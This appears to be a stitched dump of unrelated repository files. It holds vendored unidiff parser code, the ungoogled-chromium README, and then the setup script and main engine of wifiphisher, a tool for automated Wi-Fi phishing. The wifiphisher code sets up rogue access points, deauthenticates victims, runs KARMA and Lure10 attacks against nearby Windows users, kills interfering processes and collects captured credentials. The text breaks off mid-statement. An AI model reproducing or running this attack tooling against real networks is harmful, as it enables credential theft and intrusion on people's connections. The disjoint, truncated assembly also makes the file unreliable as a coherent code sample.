import __version__ from .patch import ( DEFAULT_ENCODING, LINE_TYPE_ADDED, LINE_TYPE_CONTEXT, LINE_TYPE_REMOVED, Hunk, PatchedFile, PatchSet, UnidiffParseError, ) VERSION = __version__.__version__ File: devutils/third_party/unidiff/__version__.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. __version__ = '0.5.5' File: devutils/third_party/unidiff/errors.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. """Errors and exceptions raised by the package.""" from __future__ import unicode_literals class UnidiffParseError(Exception): """Exception when parsing the unified diff data."""
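# --- Illustrative aside (not part of the vendored package above) ------------
# A small usage sketch for the vendored unidiff parser. It assumes
# devutils/third_party is on sys.path so that `unidiff` resolves to the copy
# above (the upstream PyPI package of the same name exposes the same API).
from unidiff import PatchSet

SAMPLE_DIFF = """\
--- a/hello.txt
+++ b/hello.txt
@@ -1,2 +1,2 @@
-hello world
+hello there
 unchanged line
"""

patch_set = PatchSet.from_string(SAMPLE_DIFF)
for patched_file in patch_set:
    # PatchedFile.path strips the "a/" and "b/" prefixes
    print(patched_file.path, patched_file.added, patched_file.removed)
# Expected output: hello.txt 1 1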
# ungoogled-chromium *A lightweight approach to removing Google web service dependency* **Help is welcome!** See the [docs/contributing.md](docs/contributing.md) document for more information. ## Objectives In descending order of significance (i.e. most important objective first): 1. **ungoogled-chromium is Google Chromium, sans dependency on Google web services**. 2. **ungoogled-chromium retains the default Chromium experience as closely as possible**. Unlike other Chromium forks that have their own visions of a web browser, ungoogled-chromium is essentially a drop-in replacement for Chromium. 3. **ungoogled-chromium features tweaks to enhance privacy, control, and transparency**. However, almost all of these features must be manually activated or enabled. For more details, see [Feature Overview](#feature-overview). In scenarios where the objectives conflict, the objective of higher significance should take precedence. ## Content Overview * [Objectives](#objectives) * [Motivation and Philosophy](#motivation-and-philosophy) * [Feature Overview](#feature-overview) * [**Downloads**](#downloads) * [Source Code](#source-code) * [**FAQ**](#faq) * [Building Instructions](#building-instructions) * [Design Documentation](#design-documentation) * [**Contributing, Reporting, Contacting**](#contributing-reporting-contacting) * [Credits](#credits) * [Related Projects](#related-projects) * [License](#license) ## Motivation and Philosophy Without signing in to a Google Account, Chromium does pretty well in terms of security and privacy. However, Chromium still has some dependency on Google web services and binaries. In addition, Google designed Chromium to be easy and intuitive for users, which means they compromise on transparency and control of internal operations. ungoogled-chromium addresses these issues in the following ways: 1. Remove all remaining background requests to any web services while building and running the browser 2. Remove all code specific to Google web services 3. Remove all uses of pre-made binaries from the source code, and replace them with user-provided alternatives when possible. 4. Disable features that inhibit control and transparency, and add or modify features that promote them (these changes will almost always require manual activation or enabling). These features are implemented as configuration flags, patches, and custom scripts. For more details, consult the [Design Documentation](docs/design.md). ## Feature Overview *This section overviews the features of ungoogled-chromium. For more detailed information, it is best to consult the source code.* Contents of this section: * [Key Features](#key-features) * [Enhancing Features](#enhancing-features) * [Borrowed Features](#borrowed-features) * [Supported Platforms and Distributions](#supported-platforms-and-distributions) ### Key Features *These are the core features introduced by ungoogled-chromium.* * Disable functionality specific to Google domains (e.g. Google Host Detector, Google URL Tracker, Google Cloud Messaging, Google Hotwording, etc.) * This includes disabling [Safe Browsing](https://en.wikipedia.org/wiki/Google_Safe_Browsing). Consult [the FAQ for the rationale](https://ungoogled-software.github.io/ungoogled-chromium-wiki/faq#why-is-safe-browsing-disabled). * Block internal requests to Google at runtime. This feature is a fail-safe measure for the above, in case Google changes or introduces new components that our patches do not disable. 
This feature is implemented by replacing many Google web domains in the source code with non-existent alternatives ending in `qjz9zk` (known as domain substitution; [see docs/design.md](docs/design.md#source-file-processors) for details), then [modifying Chromium to block its own requests with such domains](patches/core/ungoogled-chromium/block-trk-and-subdomains.patch). In other words, no connections are attempted to the `qjz9zk` domain. * Strip binaries from the source code (known as binary pruning; [see docs/design.md](docs/design.md#source-file-processors) for details) ### Enhancing Features *These are the non-essential features introduced by ungoogled-chromium.* * Add many new command-line switches and `chrome://flags` entries to configure new features (which are disabled by default). See [docs/flags.md](docs/flags.md) for the exhaustive list. * Add *Suggestions URL* text field in the search engine editor (`chrome://settings/searchEngines`) for customizing search engine suggestions. * Add more URL schemes allowed to save page schemes. * Add Omnibox search provider "No Search" to allow disabling of searching * Add a custom cross-platform build configuration and packaging wrapper for Chromium. It currently supports many Linux distributions, macOS, and Windows. (See [docs/design.md](docs/design.md) for details on the system.) * Force all pop-ups into tabs * Disable automatic formatting of URLs in Omnibox (e.g. stripping `http://`, hiding certain parameters) * Disable intranet redirect detector (extraneous DNS requests) * This breaks captive portal detection, but captive portals still work. * (Iridium Browser feature change) Prevent URLs with the `trk:` scheme from connecting to the Internet * Also prevents any URLs with the top-level domain `qjz9zk` (as used in domain substitution) from attempting a connection. * (Windows-specific) Do not set the Zone Identifier on downloaded files ### Borrowed Features In addition to the features introduced by ungoogled-chromium, ungoogled-chromium selectively borrows many features from the following projects (in approximate order of significance): * [Inox patchset](https://github.com/gcarq/inox-patchset) * [Bromite](https://github.com/bromite/bromite) * [Debian](https://tracker.debian.org/pkg/chromium) * [Iridium Browser](https://iridiumbrowser.de/) ### Supported Platforms and Distributions [See docs/platforms.md for a list of supported platforms](docs/platforms.md). Other platforms are discussed and tracked in this repository's Issue Tracker. Learn more about using the Issue Tracker under the section [Contributing, Reporting, Contacting](#contributing-reporting-contacting). ## Downloads ### Automated or maintained builds ungoogled-chromium is available in the following **software repositories**: * Arch: Available in AUR & OBS, [see instructions in ungoogled-chromium-archlinux](https://github.com/ungoogled-software/ungoogled-chromium-archlinux) * Debian & Ubuntu: Available in OBS, find your [distribution specific instructions](https://github.com/ungoogled-software/ungoogled-chromium-debian) in the Installing section * Fedora: Available in [COPR](https://copr.fedorainfracloud.org/coprs/) as [`wojnilowicz/ungoogled-chromium`](https://copr.fedorainfracloud.org/coprs/wojnilowicz/ungoogled-chromium/). Also available in [RPM Fusion](https://rpmfusion.org/Configuration) as `chromium-browser-privacy` (outdated). 
* Gentoo: Available in [`::pf4public`](https://github.com/PF4Public/gentoo-overlay) overlay as [`ungoogled-chromium`](https://github.com/PF4Public/gentoo-overlay/tree/master/www-client/ungoogled-chromium) and [`ungoogled-chromium-bin`](https://github.com/PF4Public/gentoo-overlay/tree/master/www-client/ungoogled-chromium-bin) ebuilds * [OpenMandriva](https://openmandriva.org/) includes ungoogled-chromium as its main browser. The `chromium` package includes all ungoogling patches. * macOS: Available in [Homebrew](https://brew.sh/) as [`eloston-chromium`](https://formulae.brew.sh/cask/eloston-chromium). Just run `brew install --cask eloston-chromium`. Chromium will appear in your `/Applications` directory. If your GNU/Linux distribution is not listed, there are distro-independent builds available via the following **package managers**: * Flatpak: Available [in the Flathub repo](https://flathub.org/apps/details/io.github.ungoogled_software.ungoogled_chromium) as `io.github.ungoogled_software.ungoogled_chromium` * GNU Guix: Available as `ungoogled-chromium` * NixOS/nixpkgs: Available as `ungoogled-chromium` ### Third-party binaries If your operating system is not listed above, you can also try to [**Download binaries from here**](https://ungoogled-software.github.io/ungoogled-chromium-binaries/) *NOTE: These binaries are provided by anyone who are willing to build and submit them. Because these binaries are not necessarily [reproducible](https://reproducible-builds.org/), authenticity cannot be guaranteed; In other words, there is always a non-zero probability that these binaries may have been tampered with. In the unlikely event that this has happened to you, please [report it in a new issue](#contributing-reporting-contacting).* These binaries are known as **contributor binaries**. ## Source Code This repository only contains the common code for all platforms; it does not contain all the configuration and scripts necessary to build ungoogled-chromium. Most users will want to use platform-specific repos, where all the remaining configuration and scripts are provided for specific platforms: [**Find the repo for a specific platform here**](docs/platforms.md). If you wish to include ungoogled-chromium code in your own build process, consider using [the tags in this repo](https://github.com/ungoogled-software/ungoogled-chromium/tags). These tags follow the format `{chromium_version}-{revision}` where * `chromium_version` is the version of Chromium used in `x.x.x.x` format, and * `revision` is a number indicating the version of ungoogled-chromium for the corresponding Chromium version. Additionally, most platform-specific repos extend their tag scheme upon this one. 
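For illustration only, a hypothetical tag such as `112.0.5615.49-1` splits back into these two components as follows (a minimal sketch, not part of any ungoogled-chromium tooling):

```py
tag = "112.0.5615.49-1"  # hypothetical tag, used only for illustration
chromium_version, revision = tag.rsplit("-", 1)
print(chromium_version)  # 112.0.5615.49
print(int(revision))     # 1
```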
**Building the source code**: [See docs/building.md](docs/building.md) ### Mirrors List of mirrors: * [Codeberg](https://codeberg.org): [main repo](https://codeberg.org/ungoogled-software/ungoogled-chromium) and [ungoogled-software](https://codeberg.org/ungoogled-software) ## FAQ [See the frequently-asked questions (FAQ) on the Wiki](https://ungoogled-software.github.io/ungoogled-chromium-wiki/faq) ## Building Instructions [See docs/building.md](docs/building.md) ## Design Documentation [See docs/design.md](docs/design.md) ## Contributing, Reporting, Contacting * For reporting and contacting, see [SUPPORT.md](SUPPORT.md) * If you're willing to help, check out the [Issue Tracker](https://github.com/ungoogled-software/ungoogled-chromium/issues) and especially issues, which [need help](https://github.com/ungoogled-software/ungoogled-chromium/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22) * For contributing (e.g. how to help, submitting changes, criteria for new features), see [docs/contributing.md](docs/contributing.md) * If you have some small contributions that don't fit our criteria, consider adding them to [ungoogled-software/contrib](https://github.com/ungoogled-software/contrib) or [our Wiki](https://github.com/ungoogled-software/ungoogled-chromium-wiki) instead. ## Credits * [The Chromium Project](https://www.chromium.org/) * [Inox patchset](https://github.com/gcarq/inox-patchset) * [Debian](https://tracker.debian.org/pkg/chromium-browser) * [Bromite](https://github.com/bromite/bromite) * [Iridium Browser](https://iridiumbrowser.de/) * The users for testing and debugging, [contributing code](https://github.com/ungoogled-software/ungoogled-chromium/graphs/contributors), providing feedback, or simply using ungoogled-chromium in some capacity. ## Related Projects List of known projects that fork or use changes from ungoogled-chromium: * [Bromite](https://github.com/bromite/bromite) (Borrows some patches. Features builds for Android) * [ppc64le fork](https://github.com/leo-lb/ungoogled-chromium) (Fork with changes to build for ppc64le CPUs) ## License BSD-3-clause. See [LICENSE](LICENSE)
wifiphisher
bc4a077e090d59b065cf2c65b0ec1890b9eb4698
File: setup.py #!/usr/bin/env python3 r""" _ __ _ _ _ _ (_)/ _(_) | | (_) | | ((.)) __ ___| |_ _ _ __ | |__ _ ___| |__ ___ _ __ | \ \ /\ / / | _| | '_ \| '_ \| / __| '_ \ / _ \ '__| /_\ \ V V /| | | | | |_) | | | | \__ \ | | | __/ | /___\ \_/\_/ |_|_| |_| .__/|_| |_|_|___/_| |_|\___|_| / \ | | |_| Version {} """ import os import sys import shutil import tempfile import distutils.sysconfig import distutils.ccompiler from distutils.errors import CompileError, LinkError from setuptools import Command, find_packages, setup from textwrap import dedent import wifiphisher.common.constants as constants try: raw_input # Python 2 sys.exit("Please use Python 3 to install Wifiphisher.") except NameError: pass # Python 3 class CleanCommand(Command): """Custom clean command to tidy up the project root.""" user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): os.system('rm -vrf ./build ./dist ./*.pyc ./*.tgz ./*.egg-info') # code for checking if libnl-dev and libnl-genl-dev exist LIBNL_CODE = dedent(""" #include <netlink/netlink.h> #include <netlink/genl/genl.h> int main(int argc, char* argv[]) { struct nl_msg *testmsg; testmsg = nlmsg_alloc(); nlmsg_free(testmsg); return 0; } """) # code for checking if openssl library exist OPENSSL_CODE = dedent(""" #include <openssl/ssl.h> #include <openssl/err.h> int main(int argc, char* argv[]) { SSL_load_error_strings(); return 0; } """) LIBNAME_CODE_DICT = { "netlink": LIBNL_CODE, "openssl": OPENSSL_CODE } def check_required_library(libname, libraries=None, include_dir=None): """ Check if the required shared library exists :param libname: The name of shared library :type libname: str :return True if the required shared lib exists else false :rtype: bool """ build_success = True tmp_dir = tempfile.mkdtemp(prefix='tmp_' + libname + '_') bin_file_name = os.path.join(tmp_dir, 'test_' + libname) file_name = bin_file_name + '.c' with open(file_name, 'w') as filep: filep.write(LIBNAME_CODE_DICT[libname]) compiler = distutils.ccompiler.new_compiler() distutils.sysconfig.customize_compiler(compiler) try: compiler.link_executable( compiler.compile([file_name], include_dirs=include_dir), bin_file_name, libraries=libraries, ) except CompileError: build_success = False except LinkError: build_success = False finally: shutil.rmtree(tmp_dir) if build_success: return True err_msg = "The development package for " + \ libname + " is required " + \ "for the compilation of roguehostapd. " + \ "Please install it and " + \ "rerun the script (e.g. on Debian-based systems " \ "run: apt-get install " if libname == "openssl": err_msg += "libssl-dev" else: err_msg += "libnl-3-dev libnl-genl-3-dev" sys.exit(err_msg) def check_dnsmasq(): """ Try to install dnsmasq on host machine if not present. :return: None :rtype: None """ if not os.path.isfile("/usr/sbin/dnsmasq"): sys.exit("dnsmasq not found in /usr/sbin/dnsmasq. " + "Please install dnsmasq and rerun the script " + "(e.g. 
on Debian-based systems: " + "apt-get install dnsmasq)") # setup settings NAME = "wifiphisher" AUTHOR = "sophron" AUTHOR_EMAIL = "[email protected]" URL = "https://github.com/wifiphisher/wifiphisher" DESCRIPTION = "Automated phishing attacks against Wi-Fi networks" LICENSE = "GPL" KEYWORDS = ["wifiphisher", "evil", "twin", "phishing"] PACKAGES = find_packages(exclude=["docs", "tests"]) INCLUDE_PACKAGE_DATA = True VERSION = "1.4" CLASSIFIERS = ["Development Status :: 5 - Production/Stable", "License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)", "Natural Language :: English", "Operating System :: Unix", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 2 :: Only", "Topic :: Security", "Topic :: System :: Networking", "Intended Audience :: End Users/Desktop", "Intended Audience :: System Administrators", "Intended Audience :: Information Technology"] ENTRY_POINTS = {"console_scripts": ["wifiphisher = wifiphisher.pywifiphisher:run"]} INSTALL_REQUIRES = ["pbkdf2", "scapy", "tornado>=5.0.0", "roguehostapd", "pyric"] DEPENDENCY_LINKS = \ ["http://github.com/wifiphisher/roguehostapd/tarball/master#egg=roguehostapd-1.9.0", \ "http://github.com/sophron/pyric/tarball/master#egg=pyric-0.5.0"] CMDCLASS = {"clean": CleanCommand,} LIB_NL3_PATH = '/usr/include/libnl3' LIB_SSL_PATH = '/usr/include/openssl' check_dnsmasq() check_required_library("netlink", ["nl-3", "nl-genl-3"], [LIB_NL3_PATH]) check_required_library("openssl", ["ssl"], [LIB_SSL_PATH]) shutil.rmtree('tmp') # run setup setup(name=NAME, author=AUTHOR, author_email=AUTHOR_EMAIL, description=DESCRIPTION, license=LICENSE, keywords=KEYWORDS, packages=PACKAGES, include_package_data=INCLUDE_PACKAGE_DATA, version=VERSION, entry_points=ENTRY_POINTS, install_requires=INSTALL_REQUIRES, dependency_links=DEPENDENCY_LINKS, classifiers=CLASSIFIERS, url=URL, cmdclass=CMDCLASS) print(__doc__.format(VERSION)) # print the docstring located at the top of this file File: wifiphisher/__init__.py File: wifiphisher/pywifiphisher.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # pylint: skip-file import argparse import curses import fcntl import logging import logging.config import os import signal import socket import struct import subprocess import sys import time from shutil import copyfile from subprocess import PIPE, Popen, check_output from threading import Thread import wifiphisher.common.accesspoint as accesspoint import wifiphisher.common.extensions as extensions import wifiphisher.common.firewall as firewall import wifiphisher.common.globals as universal import wifiphisher.common.interfaces as interfaces import wifiphisher.common.macmatcher as macmatcher import wifiphisher.common.opmode as opmode import wifiphisher.common.phishinghttp as phishinghttp import wifiphisher.common.phishingpage as phishingpage import wifiphisher.common.recon as recon import wifiphisher.common.tui as tui import wifiphisher.common.victim as victim from six.moves import range, input from wifiphisher.common.constants import (BIRTHDAY, CHANNEL, DEAUTH_EXTENSION, DEFAULT_EXTENSIONS, DEV, DN, G, HANDSHAKE_VALIDATE_EXTENSION, INTERFERING_PROCS, KNOWN_BEACONS_EXTENSION, LOGGING_CONFIG, LURE10_EXTENSION, MAC_PREFIX_FILE, NETWORK_GW_IP, NEW_YEAR, O, PORT, R, ROGUEHOSTAPDINFO, SSL_PORT, T, W, WEBSITE, WPSPBC) logger = logging.getLogger(__name__) def parse_args(): # Create the arguments parser = argparse.ArgumentParser() # Interface selection parser.add_argument( "-i", "--interface", help=("Manually 
choose an interface that supports both AP and monitor " + "modes for spawning the rogue AP as well as mounting additional " + "Wi-Fi attacks from Extensions (i.e. deauth). " + "Example: -i wlan1")) parser.add_argument( "-eI", "--extensionsinterface", help=("Manually choose an interface that supports monitor mode for " + "deauthenticating the victims. " + "Example: -eI wlan1")) parser.add_argument( "-aI", "--apinterface", type=opmode.validate_ap_interface, help=("Manually choose an interface that supports AP mode for " + "spawning the rogue AP. " + "Example: -aI wlan0")) parser.add_argument( "-iI", "--internetinterface", help=("Choose an interface that is connected on the Internet" + "Example: -iI ppp0")) parser.add_argument( "-pI", "--protectinterface", nargs='+', help=("Specify the interface(s) that will have their connection protected (i.e. NetworkManager will be prevented from controlling them). " + "Example: -pI wlan1 wlan2")) parser.add_argument( "-mI", "--mitminterface", help=("Choose an interface that is connected on the Internet in order to perform a MITM attack. All other interfaces will be protected." + "Example: -mI wlan1")) # MAC address randomization parser.add_argument( "-iAM", "--mac-ap-interface", help=("Specify the MAC address of the AP interface")) parser.add_argument( "-iEM", "--mac-extensions-interface", help=("Specify the MAC address of the extensions interface")) parser.add_argument( "-iNM", "--no-mac-randomization", help=("Do not change any MAC address"), action='store_true') parser.add_argument( "-kN", "--keepnetworkmanager", action='store_true', help=("Do not kill NetworkManager")) parser.add_argument( "-nE", "--noextensions", help=("Do not load any extensions."), action='store_true') parser.add_argument( "-nD", "--nodeauth", help=("Skip the deauthentication phase."), action='store_true') parser.add_argument( "-dC", "--deauth-channels", nargs="+", type=int, help=("Channels to deauth. " + "Example: --deauth-channels 1,3,7")) parser.add_argument( "-e", "--essid", help=("Enter the ESSID of the rogue Access Point. " + "This option will skip Access Point selection phase. " + "Example: --essid 'Free WiFi'")) parser.add_argument( "-dE", "--deauth-essid", help=("Deauth all the BSSIDs in the WLAN with that ESSID.")) parser.add_argument( "-p", "--phishingscenario", help=("Choose the phishing scenario to run." + "This option will skip the scenario selection phase. " + "Example: -p firmware_upgrade")) parser.add_argument( "-pK", "--presharedkey", help=("Add WPA/WPA2 protection on the rogue Access Point. " + "Example: -pK s3cr3tp4ssw0rd")) parser.add_argument( "-hC", "--handshake-capture", help=("Capture of the WPA/WPA2 handshakes for verifying passphrase. " + "Requires cowpatty. " + "Example : -hC capture.pcap")) parser.add_argument( "-qS", "--quitonsuccess", help=("Stop the script after successfully retrieving one pair of " "credentials"), action='store_true') parser.add_argument( "-lC", "--lure10-capture", help=("Capture the BSSIDs of the APs that are discovered during " "AP selection phase. This option is part of Lure10 attack."), action='store_true') parser.add_argument( "-lE", "--lure10-exploit", help=("Fool the Windows Location Service of nearby Windows users " "to believe it is within an area that was previously captured " "with --lure10-capture. 
Part of the Lure10 attack.")) parser.add_argument( "--logging", help="Log activity to file", action="store_true") parser.add_argument( "-dK", "--disable-karma", help="Disables KARMA attack", action="store_true") parser.add_argument( "-lP", "--logpath", default=None, help="Determine the full path of the logfile.") parser.add_argument( "-cP", "--credential-log-path", help="Determine the full path of the file that will store any captured credentials", default=None) parser.add_argument( "--payload-path", help=("Payload path for scenarios serving a payload")) parser.add_argument("-cM", "--channel-monitor", help="Monitor if target access point changes the channel.", action="store_true") parser.add_argument("-wP", "--wps-pbc", help="Monitor if the button on a WPS-PBC Registrar is pressed.", action="store_true") parser.add_argument("-wAI", "--wpspbc-assoc-interface", help="The WLAN interface used for associating to the WPS AccessPoint.", ) parser.add_argument( "-kB", "--known-beacons", help="Broadcast a number of beacon frames advertising popular WLANs", action='store_true') parser.add_argument( "-fH", "--force-hostapd", help="Force the usage of hostapd installed in the system", action='store_true') parser.add_argument("-pPD", "--phishing-pages-directory", help="Search for phishing pages in this location") parser.add_argument( "--dnsmasq-conf", help="Determine the full path of a custom dnmasq.conf file", default='/tmp/dnsmasq.conf') parser.add_argument( "-pE", "--phishing-essid", help="Determine the ESSID you want to use for the phishing page") return parser.parse_args() VERSION = "1.4GIT" args = parse_args() APs = {} # for listing APs def setup_logging(args): """ Setup the logging configurations """ root_logger = logging.getLogger() # logging setup if args.logging: if args.logpath: LOGGING_CONFIG['handlers']['file']['filename'] = args.logpath logging.config.dictConfig(LOGGING_CONFIG) should_roll_over = False # use root logger to rotate the log file if os.path.getsize(LOGGING_CONFIG['handlers']['file']['filename']) > 0: should_roll_over = os.path.isfile(LOGGING_CONFIG['handlers']['file']['filename']) should_roll_over and root_logger.handlers[0].doRollover() logger.info("Starting Wifiphisher") def set_ip_fwd(): """ Set kernel variables. """ Popen(['sysctl', '-w', 'net.ipv4.ip_forward=1'], stdout=DN, stderr=PIPE) def set_route_localnet(): """ Set kernel variables. """ Popen( ['sysctl', '-w', 'net.ipv4.conf.all.route_localnet=1'], stdout=DN, stderr=PIPE) def set_channel_range(): """ Set channel range accordingly. """ region = time.tzname[time.daylight] if "JST" in region: print('[' + G + '+' + W + "] " + \ "JST timezone detected. " + \ "Setting channel range to 1-14") universal.ALL_2G_CHANNELS = list(range(1,15)) return print('[' + G + '+' + W + "] " + \ "Timezone detected. " + \ "Setting channel range to 1-13") universal.ALL_2G_CHANNELS = list(range(1,14)) return def kill_interfering_procs(): """ Kill the interfering processes that may interfere the wireless card :return None :rtype None ..note: The interfering processes are referenced by airmon-zc. 
""" # stop the NetworkManager related services # incase service is not installed catch OSError try: subprocess.Popen( ['service', 'network-manager', 'stop'], stdout=subprocess.PIPE, stderr=DN) subprocess.Popen( ['service', 'NetworkManager', 'stop'], stdout=subprocess.PIPE, stderr=DN) subprocess.Popen( ['service', 'avahi-daemon', 'stop'], stdout=subprocess.PIPE, stderr=DN) except OSError: pass # Kill any possible programs that may interfere with the wireless card proc = Popen(['ps', '-A'], stdout=subprocess.PIPE) output = proc.communicate()[0] # total processes in the system sys_procs = output.splitlines() # loop each interfering processes and find if it is running for interfering_proc in INTERFERING_PROCS: for proc in sys_procs: # kill all the processes name equal to interfering_proc if interfering_proc in proc.decode('utf-8'): pid = int(proc.split(None, 1)[0]) print('[' + G + '+' + W + "] Sending SIGKILL to " +\ interfering_proc) os.kill(pid, signal.SIGKILL) class WifiphisherEngine: def __init__(self): self.mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE) self.network_manager = interfaces.NetworkManager() self.template_manager = phishingpage.TemplateManager() self.access_point = accesspoint.AccessPoint() self.fw = firewall.Fw() self.em = extensions.ExtensionManager(self.network_manager) self.opmode = opmode.OpMode() self.victim = victim.Victims() def stop(self): if DEV: print("[" + G + "+" + W + "] Show your support!") print("[" + G + "+" + W + "] Follow us: https://twitter.com/wifiphisher") print("[" + G + "+" + W + "] Like us: https://www.facebook.com/Wifiphisher") print("[" + G + "+" + W + "] Captured credentials:") for cred in phishinghttp.creds: logger.info("Credentials: %s", cred) print(cred) # EM depends on Network Manager. # It has to shutdown first. self.em.on_exit() # AP depends on NM too. self.access_point.on_exit() try: self.network_manager.on_exit() except interfaces.InvalidMacAddressError as err: print(("[{0}!{1}] {2}").format(R, W, err)) self.template_manager.on_exit() self.fw.on_exit() if os.path.isfile('/tmp/wifiphisher-webserver.tmp'): os.remove('/tmp/wifiphisher-webserver.tmp') print('[' + R + '!' + W + '] Closing') sys.exit(0) def start(self): today = time.strftime("%Y-%m-%d %H:%M") print('[' + T + '*' + W + '] Starting Wifiphisher %s ( %s ) at %s' % (VERSION, WEBSITE, today)) # Show some emotions. if BIRTHDAY in today: print('[' + T + '*' + W + \ '] Wifiphisher was first released on this day in 2015! ' \ 'Happy birthday!') if NEW_YEAR in today: print('[' + T + '*' + W + \ '] Happy new year!') # First of - are you root? if os.geteuid(): logger.error("Non root user detected") sys.exit('[' + R + '-' + W + '] Please run as root') # Set the channel range set_channel_range() # Parse args global args, APs args = parse_args() # setup the logging configuration setup_logging(args) if args.phishing_pages_directory: # check if the path ends with the proper separator, if not add it # this is to prevent problems when joining path with string concatenation if args.phishing_pages_directory[-1] != os.path.sep: args.phishing_pages_directory += os.path.sep phishing_pages_dir = args.phishing_pages_directory logger.info("Searching for scenario in %s" % phishing_pages_dir) if args.dnsmasq_conf: self.access_point.dns_conf_path = args.dnsmasq_conf if args.credential_log_path: phishinghttp.credential_log_path = args.credential_log_path # Handle the chosen interface as an internetInterface in order to # leverage existing functionality. 
# In case `--internetinterface` is also used it will be overwritten with a warning. # # There are two cases for a provided args.mitminterface: # - In case args.internetinterface is also provided, swap their values so that we can # leverage args.internetinterface functionality but at the same time keep the fact that # it was provided as an argument, in order to be able to warn the user. # # - In case no args.internetinterface is provided, manually set args.mitminterface to a # specific string to account for further checks. if args.mitminterface: if args.internetinterface: args.internetinterface, args.mitminterface = args.mitminterface, args.internetinterface else: args.internetinterface = args.mitminterface args.mitminterface = "handledAsInternetInterface" # Initialize the operation mode manager self.opmode.initialize(args) # Set operation mode self.opmode.set_opmode(args, self.network_manager) self.network_manager.start(args) # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if self.opmode.internet_sharing_enabled(): self.network_manager.internet_access_enable = True # Set up an automatic MITM attack if `-mI/--mitminterface` was already present. # # We are already handling the chosen interface as an internetInterface. # Here we are also protecting the rest of the detected interfaces. # (i.e. prevent NetworkManager from managing them) # The value of args.mitminterface does not concern us, unless empty. We will be performing # all operations using args.internetinterface instead. if args.mitminterface: for interface in self.network_manager._name_to_object: if interface != args.internetinterface: self.network_manager.nm_unmanage(interface) if self.network_manager.is_interface_valid( args.internetinterface, "internet"): internet_interface = args.internetinterface if interfaces.is_wireless_interface(internet_interface): try: self.network_manager.unblock_interface( internet_interface) except KeyError: # TODO: Find a workaround for managing blocked adapters that do not support nl80211 # Calling unblock on internet interfaces might return a `Key Error` if it does not # support nl80211. This will be a problem if the interface is blocked as it cannot # be unblocked automatically. Let the user know with a warning. logger.warning("Interface {} does not support 'nl80211'. 
In case it is blocked,\ you must unblock it manually".format(internet_interface)) logger.info("Selecting %s interface for accessing internet", args.internetinterface) # check if the interface for WPS is valid if self.opmode.assoc_enabled(): if self.network_manager.is_interface_valid( args.wpspbc_assoc_interface, "WPS"): logger.info("Selecting %s interface for WPS association", args.wpspbc_assoc_interface) if self.opmode.extensions_enabled(): if args.extensionsinterface and args.apinterface: if self.network_manager.is_interface_valid( args.extensionsinterface, "monitor"): mon_iface = args.extensionsinterface self.network_manager.unblock_interface(mon_iface) if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: mon_iface, ap_iface = self.network_manager.get_interface_automatically( ) # display selected interfaces to the user logger.info( "Selecting {} for deauthentication and {} for the rogue Access Point" .format(mon_iface, ap_iface)) print(( "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication " "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the " "rogue Access Point").format(G, W, mon_iface, ap_iface)) if not self.opmode.extensions_enabled(): if args.apinterface: if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: ap_iface = self.network_manager.get_interface(True, False) mon_iface = ap_iface print(( "[{0}+{1}] Selecting {0}{2}{1} interface for creating the " "rogue Access Point").format(G, W, ap_iface)) logger.info("Selecting {} interface for rogue Access Point" .format(ap_iface)) # Randomize MAC if not args.no_mac_randomization: try: new_mac = self.network_manager.set_interface_mac(ap_iface, args.mac_ap_interface) logger.info("Changing {} MAC address to {}".format( ap_iface, new_mac)) print("[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, new_mac)) if mon_iface != ap_iface: new_mac = self.network_manager.set_interface_mac(mon_iface, args.mac_extensions_interface) logger.info("Changing {} MAC address to {}".format( mon_iface, new_mac)) print("[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, 